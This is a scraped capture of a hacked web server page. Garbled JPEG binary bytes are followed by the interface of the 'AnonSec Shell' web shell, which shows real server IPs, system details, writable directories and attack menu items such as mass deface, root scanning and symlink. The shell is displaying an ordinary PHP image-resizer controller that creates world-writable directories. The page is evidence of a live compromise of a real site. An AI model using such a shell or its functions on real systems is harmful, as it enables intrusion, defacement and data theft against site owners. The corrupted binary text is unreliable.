JFIFHHCnxxdC"&!1A2Q"aqBb1 ?R{~,.Y|@sl_޸s[+6ϵG};?2Y`&9LP?3rj  "@V]:3T-G*P ( *(@AEY]qqqALn+Wtu?)lQUT*Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ηnu ڶh%(Lvũbb-?M֍݌٥IHln㏷L(69L^"6Pd&1H&8@TUTCJ%eʹFTj4i5=0g J&Wc+3kU@PS@HH33M *"Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePPd\A2glo=WL(6^;k"ucoH"b ,PDVlvL_/:̗rN\mdcw T-O$w+FZ5T *Y~l:99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~YИ3M3@E)GTg%AnpPMUҀhԳW c֦iZ ffR 7qMcyAZTc0bZU k+oG<]APQTA={PDti@c>>KÚ"qL.1Pk6QY7t.k7o<P &yַܼJZyWz{UrS@~P)Y:A"]Y&ScVO%17 6l4i4YR5ruk*ؼdZͨZZ cLakb3N6æ\1`XTloTuTAA 7Uq@2ŬzoʼnБRͪ&8}:e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt"(.=Y:V#'H:δ4#6yjѥBB ;WD-ElFf67*\AmADQ__'2$TX9nu'm@iPDTqS`%u%3[nY, :g = tiXH]ij"+6Z* .~|05s6 ,ǡogm+KtE-BF ES@(UJxM~8%g/=Vw[Vh3lJT rK -kˎYٰ,ukͱٵf sXDP]p]&MS95O+j&f6m463@t8ЕX=6}HR5ٶ06/@嚵*6  "hP@eVDiYQT`7tLf4c?m//B4 lajL} :Eb#PHQb,yN`rkAb^ |}s4XB4*,@[{Ru+%le2}`,kI$U`>OMuhP% ʵ/ L\5aɕVN1R63}ZLj-Dl@*(K\^i@F@551k㫖hQ沬#h XV +;]6zOsFpiX$OQ )ųl4YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 162.19.86.63  /  Your IP : 216.73.217.81   [ Reverse IP ]
Web Server : Apache
System : Linux oirealestate.net 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : oinversion ( 10001)
PHP Version : 5.6.40
Disable Function : opcache_get_status
Domains : 5 Domains
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/oinversion.com/httpdocs/common/modules/resizer/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/vhosts/oinversion.com/httpdocs/common/modules/resizer/controllers/DefaultController.php
<?php

namespace common\modules\resizer\controllers;

use yii\web\Controller;
use yii\web\HttpException;

/**
 * Default controller for the `resizer` module
 */
class DefaultController extends Controller {

  /**
   * Renders the index view for the module
   * @return string
   */
  public function actionIndex() {
    
    $request=\Yii::$app->request;
    $pathInfo = $request->getPathInfo();
    
    // Split url into parts
    $url_parts= explode("/", $pathInfo);
    
    
    // Get the resize rule name
    $filterName = $url_parts[2];

    // Remove the unnecesary parts from the beggining and recompose the resize_path
    foreach (range(0, 2) as $r) {
      unset($url_parts[$r]);
    }
    $resize_path = implode("/", $url_parts);
    
//    \yii\helpers\VarDumper::dump($url_parts, 10, true);
//    \yii\helpers\VarDumper::dump($resize_path, 10, true);
    
    // Check path is allowed
    if (!$this->resizeCheckAllowedPath($resize_path)) {
      throw new HttpException(500, "Resize path not allowed: {$resize_path}.");
    }

    // Check filter is defined
    $filters = \Yii::$app->getModule('resizer')->filters;
    if (!isset($filters[$filterName])) {
      throw new HttpException(500, "Resize filter not found: {$filterName}.");
    }
    
//    die();
    
    // Check original file exists
    $resize_absolute_path = \Yii::getAlias('@webroot') . "/" . $resize_path;
//    \yii\helpers\VarDumper::dump($resize_absolute_path, 10, true);
    if (!file_exists($resize_absolute_path) && !empty(\Yii::$app->getModule('resizer')->notFound)) {
      $resize_absolute_path = \Yii::getAlias('@webroot') . "/" . \Yii::$app->getModule('resizer')->notFound;
    }
    
//    \yii\helpers\VarDumper::dump($resize_path, 10, true);
//    \yii\helpers\VarDumper::dump($resize_absolute_path, 10, true);
//    
//    die();
    
    if (!file_exists($resize_absolute_path)) {
      throw new HttpException(404, "Not found");
    }

    // Build destination path
    $destination_parts= explode("/", $pathInfo);

    $destination_filename = array_pop($destination_parts);
    
//    \yii\helpers\VarDumper::dump($destination_parts, 10, true);
//    \yii\helpers\VarDumper::dump($destination_filename, 10, true);
//    die();

    $destination_dir = \Yii::getAlias('@webroot');
    foreach ($destination_parts as $part) {
      $destination_dir .= "/{$part}";
      if (!file_exists($destination_dir)) {
        mkdir($destination_dir, 0777);
        chmod($destination_dir, 0777);
      }
//      echo $destination_dir."<br>";
    }
    
//    die('yay');
    
    $extension=$this->getImageExtension($destination_filename);
    
    $filterClass=$filters[$filterName];
    $filter=new $filterClass;
    $filter->run($resize_absolute_path, $destination_dir . "/" . $destination_filename)->show($extension);
    
//    return 'test';

//    // Resize and save picture
//    $image = Yii::app()->image->load($resize_absolute_path);
//    $resize_method = $rules[$filterName];
//    $cmd = "\$image->{$resize_method};";
//    eval($cmd);
//    $image->save($destination_dir . "/" . $destination_filename, 0644, true);
//    $image->render();
//        return $this->render('index');
  }

  private function resizeCheckAllowedPath($resize_path) {
    $allowed_paths = \Yii::$app->getModule('resizer')->allowedPaths;
    
    foreach ($allowed_paths as $path) {
      if (strpos($resize_path, $path) === 0) {
        return true;
      }
    }
    return false;
  }
  
  private function getImageExtension($filename) {
    $extension=array_pop(explode('.',$filename));
    $extension= strtolower($extension);
    if ($extension=='jpeg') {
      $extension='jpg';
    }
    return $extension;
  }

}

Anon7 - 2022
AnonSec Team